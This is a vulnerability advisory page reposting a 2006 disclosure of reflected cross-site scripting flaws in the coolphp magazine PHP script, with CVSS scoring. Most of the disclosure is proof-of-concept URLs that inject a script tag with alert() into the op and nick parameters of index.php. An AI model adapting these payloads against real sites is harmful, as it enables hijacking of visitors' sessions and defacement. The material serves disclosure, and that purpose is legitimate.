Multiple Xss exploits in coolphp magazine

2006.06.06
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

>Subject: Multiple Xss exploits in coolphp magazine >Date: 27 May 2006 14:25:31 -0000 >Multiple Xss exploits in coolphp magazine > >script type : coolphp magazine >bug found by : black-code & sweet-devil >team : site-down >type : Xss > >Codes : > >******* > >http://www.xxx.com/coolphp/index.php?op='><script>alert(10)</script> > >http://www.xxx.com/coolphp/index.php?op=userinfo&nick='><script>alert(1 0)</script> > >******* > > >And : > >http://www.xxx.com/coolphp/index.php?op=0000='><script>alert(10)</scrip t> > >Put instaed of 0000 any name as : > >http://xxx.net/coolphp/index.php?op=userinfo='><script>alert(10)</scrip t> > >or > >http://xxx.net/coolphp/index.php?op=comp_der='><script>alert(10)</scrip t> > >or > >http://xxx.net/coolphp/index.php?op=encuestas='><script>alert(10)</scri pt> > >or > >http://xxx.net/coolphp/index.php?op=pagina='><script>alert(10)</script> > > > > >Emails : > >Black-cod3 (at) hotmil (dot) com [email concealed] > >gamr-14 (at) hotmail (dot) com [email concealed] > >All my respect to my friend sweet-devil , lezr.com , g123g.net .. > >done .. peace


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top